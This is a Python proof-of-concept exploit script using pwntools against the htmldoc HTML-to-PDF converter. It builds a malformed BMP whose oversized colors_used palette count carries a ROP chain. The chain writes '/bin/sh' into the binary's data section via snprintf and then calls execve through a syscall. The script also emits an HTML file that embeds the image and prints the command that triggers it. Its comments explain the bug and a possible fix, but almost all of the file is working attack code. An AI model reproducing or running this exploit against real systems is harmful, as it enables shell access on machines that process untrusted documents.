#!/usr/bin/python3 | |
from pwn import * | |
import sys | |
import os | |
def long(v=0):
    """Encode *v* as 4 little-endian bytes (used for the BMP width/height fields)."""
    field_width = 4
    return v.to_bytes(length=field_width, byteorder="little")
def dword(v=0):
    """Encode *v* as a 4-byte little-endian unsigned value (BMP DWORD field)."""
    field_width = 4
    return v.to_bytes(length=field_width, byteorder="little")
def word(v=0):
    """Encode *v* as a 2-byte little-endian unsigned value (BMP WORD field)."""
    field_width = 2
    return v.to_bytes(length=field_width, byteorder="little")
def getc(v=0):
    """Encode *v* as a single byte (not used by the script below)."""
    field_width = 1
    return v.to_bytes(length=field_width, byteorder="little")
# ---------------------------------------------------------------------------
# PoC generator.  Writes poc.bmp, a BMP whose header declares colors_used =
# 4096 palette entries and whose palette area (colors_used * 4 bytes) carries
# a ROP chain at offset 2920, then writes poc.html, which embeds the image.
#
# The pattern this exercises: the palette length is derived from the
# attacker-controlled colors_used header field.  Presumably the parser copies
# that many entries into a fixed-size buffer -- confirm against htmldoc's BMP
# reader; the defensive fix is to bound colors_used by the maximum the
# declared depth allows before reading palette data.  Needs pwntools
# (ELF, ROP, p64, log) and a copy of the target binary at ./htmldoc.
# ---------------------------------------------------------------------------
log.info("Generating corrupted BMP image")
colors_used = 4096  # palette entries declared in the header; sizes the palette area below
width = 1
height = 1
depth = 1  # bits per pixel; far fewer than 4096 palette entries would be meaningful at 1 bpp
header = b"BM"  # BMP magic, prepended when the file is written (not part of `out`)
out = bytearray()
# Remainder of the 14-byte file header (bfSize, bfReserved1, bfReserved2,
# bfOffBits), all zero -- no attempt is made at a valid size or data offset.
out += dword()
out += word()
out += word()
out += dword()
# 40-byte info header; only width, height, depth and colors_used are set.
out += dword(0)  # info_size (biSize), left at 0
out += long(width)  # width
out += long(height)  # height
out += word()  # planes
out += word(depth)  # depth (bits per pixel)
out += dword(0)  # compression
out += dword(0)  # image size
out += long(0)  # x pixels per metre
out += long(0)  # y pixels per metre
out += dword(colors_used)  # colors_used -- the oversized palette count
out += dword()  # important colours
offset = 2920  # position inside the palette area where the chain is placed; chosen for this binary, not derived here
binsh_offset = 32  # unused
total = colors_used*4  # palette area length: one 4-byte entry per declared colour
filename = "./htmldoc"  # target binary, analysed below for gadgets and symbols
elf = ELF(filename)
rop = ROP(filename)
# Gadgets.  Absolute link-time addresses are used with no leak, so this
# assumes the binary is loaded at its link-time base (non-PIE).  find_gadget
# returns None when a gadget is absent, in which case `.address` raises.
pop_rdi = rop.find_gadget(["pop rdi","ret"]).address
pop_rsi = rop.find_gadget(["pop rsi","ret"]).address
pop_rdx = rop.find_gadget(["pop rdx","ret"]).address
pop_rcx = rop.find_gadget(["pop rcx","ret"]).address
pop_rax = rop.find_gadget(["pop rax","ret"]).address
ret = rop.find_gadget(["ret"]).address
syscall = rop.find_gadget(["syscall"]).address
data_section_base = elf.get_section_by_name('.data').header.sh_addr  # writable area used as scratch for the "/bin/sh" string
log.info('Creating ropchain for writing "/bin/sh" in data section using snprintf')
char_writer = next(elf.search(b"%c"))  # address of a "%c" byte sequence in the binary, used as the format string (the search is for "%c", not "%s")
binsh = "/bin/sh"
payload = b""
# Stage 1: one snprintf(.data + i, 2, "%c", binsh[i]) call per character.
# A size of 2 means each call writes the character plus a NUL, so the string
# is terminated after the last call.
for i in range(len(binsh)):
    payload += p64(pop_rdi) + p64(data_section_base+i)  # rdi = .data + i (destination)
    payload += p64(pop_rsi) + p64(2)  # rsi = 2 (size: one char + NUL)
    payload += p64(pop_rdx) + p64(char_writer)  # rdx = "%c" (format)
    payload += p64(pop_rcx) + p64(ord(binsh[i]))  # rcx = the character
    payload += p64(pop_rax) + p64(0)  # rax = 0 (SysV ABI: AL = number of vector registers used by a variadic call)
    payload += p64(elf.plt["snprintf"])  # return into snprintf@plt
log.info('Creating ropchain to execute /bin/sh using syscall')
# Stage 2: execve(.data, 0, 0) via raw syscall number 59
payload += p64(pop_rax) + p64(59)  # rax = 59 (execve)
payload += p64(pop_rdi) + p64(data_section_base)  # rdi = .data, now holding "/bin/sh"
payload += p64(pop_rsi) + p64(0)  # rsi = 0 (argv)
payload += p64(pop_rdx) + p64(0)  # rdx = 0 (envp)
payload += p64(ret)  # extra ret; presumably alignment padding, the syscall itself does not need it
payload += p64(syscall)
# Palette area: filler up to `offset`, the chain, then filler to exactly
# `total` bytes.  NOTE: if len(payload) > total - offset the trailing
# multiplier goes negative and yields b"", so the palette would silently be
# shorter than the header declares.
out += b"B" * (offset) + payload + b"D" * (total - offset - len(payload))
# Pixel data: one dword per width*height*depth (a single dword here).
for _ in range(width * height * depth):
    out += dword(ord("B"))
with open("poc.bmp", "wb") as f:
    f.write(header + out)
log.success("Corrupted BMP image created successfully")
# HTML wrapper that references the image.  The stray </A> has no opening
# <A>; it is left as-is because it is part of the emitted file.
exploit = '<HTML><BODY><P><IMG SRC="./poc.bmp"></A></BODY></HTML>'
with open("poc.html", "w") as f:
    f.write(exploit)
log.success("poc.html created successfully")
log.info("Exploit: {} --webpage -f out.pdf ./poc.html".format(filename))